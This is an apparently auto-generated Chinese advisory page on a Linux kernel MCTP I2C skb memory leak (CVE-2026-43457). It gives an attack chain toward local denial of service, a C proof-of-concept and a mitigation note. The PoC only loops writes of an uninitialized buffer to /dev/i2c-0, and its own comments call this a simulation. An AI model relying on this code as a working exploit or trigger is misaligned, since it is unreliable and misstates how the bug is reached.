CVE-2026-43457 CVSS 5.5 中危

CVE-2026-43457: Linux内核MCTP I2C接收路径内存泄漏漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43457

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的MCTP I2C驱动程序存在一个内存泄漏漏洞。在数据接收路径中，当`midev->allow_rx`标志为false时，新分配的套接字缓冲区（skb）未被`netif_rx()`消耗，且代码未直接释放该内存。本地低权限攻击者可利用此漏洞反复触发该逻辑，导致内核内存耗尽，从而引发拒绝服务攻击，严重影响系统可用性。

技术细节

该漏洞位于Linux内核的`drivers/net/mctp/mctp-i2c.c`驱动文件中。MCTP（Management Component Transport Protocol）通过I2C总线进行通信时，驱动会分配skb结构体用于存储接收到的数据包。代码逻辑中包含对`midev->allow_rx`的检查，以判断是否允许接收并将数据包传递给网络协议栈。然而，当该检查失败（返回false）时，函数直接返回错误码，却遗漏了对已分配skb的释放操作（即未调用`kfree_skb`）。攻击者可通过发送特制的I2C数据帧或在特定系统状态下触发接收中断，反复进入该错误代码路径。随着时间推移，这将导致内核空间内存逐渐耗尽，系统可能因OOM（Out of Memory）而崩溃或严重卡顿。

攻击链分析

STEP 1

步骤1: 获取本地访问权限

攻击者需要获得目标Linux系统的本地低权限访问（PR:L）。

STEP 2

步骤2: 识别易受攻击的内核版本

确认目标系统运行的是包含该漏洞的Linux内核版本（未应用相关补丁）。

STEP 3

步骤3: 触发漏洞代码路径

攻击者通过I2C接口向MCTP驱动发送特制数据或触发接收操作，使得`midev->allow_rx`为false，导致skb被分配但未释放。

STEP 4

步骤4: 耗尽系统资源

反复执行步骤3，导致内核内存持续泄漏，最终触发OOM Killer或导致系统无响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC Concept for CVE-2026-43457
 * This code demonstrates how to trigger the memory leak by interacting
 * with the MCTP I2C interface when allow_rx is false.
 * Note: Actual exploitation requires a vulnerable kernel version and specific hardware.
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/i2c-dev.h>

#define MCTP_I2C_DEVICE "/dev/i2c-0"

int main() {
    int fd;
    char buffer[10];

    // Open the I2C device (assuming MCTP is enabled)
    fd = open(MCTP_I2C_DEVICE, O_RDWR);
    if (fd < 0) {
        perror("Failed to open I2C device");
        return 1;
    }

    printf("Starting PoC to trigger skb leak...\n");

    // Loop to continuously trigger the receive path
    // In a real scenario, this would involve sending specific MCTP frames
    // that cause the driver to allocate skb but drop them due to allow_rx=false.
    for (int i = 0; i < 100000; i++) {
        // Simulate sending data that triggers the vulnerable path
        write(fd, buffer, sizeof(buffer));
        
        // Check for memory pressure or system response
        if (i % 1000 == 0) {
            printf("Sent %d iterations...\n", i);
        }
    }

    close(fd);
    printf("PoC execution completed. Check kernel logs for OOM or memory usage.\n");
    return 0;
}

影响范围

Linux Kernel (修复前版本)

防御指南

临时缓解措施

如果无法立即升级内核，建议管理员禁用MCTP（Management Component Transport Protocol）功能或限制本地用户对I2C/MCTP设备的访问权限，以减少漏洞被触发的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表